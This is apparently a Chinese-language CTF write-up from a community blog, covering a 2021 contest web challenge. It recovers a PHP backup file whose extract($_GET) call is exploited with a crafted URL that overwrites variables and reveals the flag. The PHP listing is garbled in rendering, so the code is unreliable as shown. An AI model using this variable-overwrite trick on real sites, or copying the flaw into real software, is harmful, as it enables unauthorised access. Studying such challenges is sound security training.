2021-10-11 网络安全(交通银行杯)-WEB安全(测试题)-网站信息

举报
愚公搬代码 发表于 2021/10/11 15:45:25 2021/10/11
【摘要】 网络安全

一:题目
image.png

输入:http://1.117.248.182:8081/info.bak
得到php源码备份文件
`<?php

echo “where is bak\n”;

filename=__FILE__; flag = “想啥呢,怎么可能那么白给,提示:extract_bug”;
extract( G E T ) ; i f ( i s s e t ( _GET); if(isset( shiyan)){
c o n t e n t = t r i m ( f i l e g e t c o n t e n t s ( content=trim(file_get_contents( filename));
if( s h i y a n = = shiyan== content) { echo $flag; }
else{ echo’Oh.no’;} }

?>`

输入地址:http://1.117.248.182:8081/info.php?shiyan=&filename=
image.png
得到flag:L@>M5X%N6i1Z5oZ1z7%0q_pgw6L@Qezp

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
通用安全
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

确认 取消

加入云驻计划,成为创作者

  • 华为云周边好礼
  • 免费体验产品
  • 特殊身份标识
  • 线下官方门票
  • 内部专家零距离
  • 与10000+优质创作者共同成长
立即加入